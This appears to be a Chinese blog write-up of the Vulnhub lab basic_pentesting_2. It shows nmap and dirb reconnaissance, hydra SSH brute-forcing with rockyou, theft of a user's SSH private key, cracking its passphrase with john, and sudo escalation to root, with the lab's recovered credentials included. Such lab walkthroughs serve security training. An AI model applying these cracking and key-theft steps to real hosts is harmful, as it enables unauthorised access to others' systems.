Vulnhub系列:basic_pentesting_2

Vulnhub系列:basic_pentesting_2

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240805182223956

nmap扫描端口,开放端口:22、80、139、445、8009、8080

nmap 192.168.23.179 -p- -A -sV -Pn

image-20240805182351505

dirb目录扫描,存在目录development

dirb http://192.168.23.179/

image-20240805182745836

访问80端口,提示正在维护

image-20240805182438037

f12查看源码,有一个提示,查看他们的开发笔记

image-20240805182719365

访问development,发现dev.txt和j.txt

image-20240805182835855

dev.txt内容

image-20240805183046789

j.txt内容

image-20240805183107030

翻译了一下,-K在说 J 这个用户是一个弱口令,很容易就破解了他的密码,kali扫描一下

enum4linux 192.168.23.179

扫描到了 kay 和 jan,应该就是之前的 K 和 J

image-20240805183613084

二、getshell

因为提到了 J 存在弱口令,所以使用hydra工具尝试爆破ssh

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.23.179 -t 64

image-20240805185744078

得到密码 armando

jan:armando

ssh连接 jan 用户,连接成功

ssh jan@192.168.23.179

image-20240805184745966

三、提权

sudo -l 查看当前权限,没有可利用的,查看用户家目录下,在kay目录下发现pass.pak和ssh公私钥文件

image-20240805185524846

查看pass.pak文件,没有权限

image-20240805185613749

进入.ssh目录

image-20240805185646536

查看私钥文件

cat id_rsa

image-20240805185723808

将内容复制到 kali 中,并赋予权限

chmod 600 id_rsa

尝试利用私钥连接,需要密码

ssh -i id_rsa kay@192.168.23.179

image-20240805190259647

利用 ssh2john 将 id_rsa 转换为哈希

ssh2john id_rsa > 1.txt

image-20240805190437263

使用 john 进行解密,得到密码 beeswax

john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt

image-20240805190605381

再次使用私钥登录,登录成功

ssh -i id_rsa kay@192.168.23.179
beeswax

image-20240805190725463

查看当前权限,需要的密码不是登录密码

image-20240805190931007

查看之前的 pass.pak,这个可能是需要的密码

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

image-20240805190901130

再次查看权限,输入密码,成功显示

sudo -l

image-20240805191101403

显示为all,直接sudo su提权,提权成功

image-20240805191148070

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值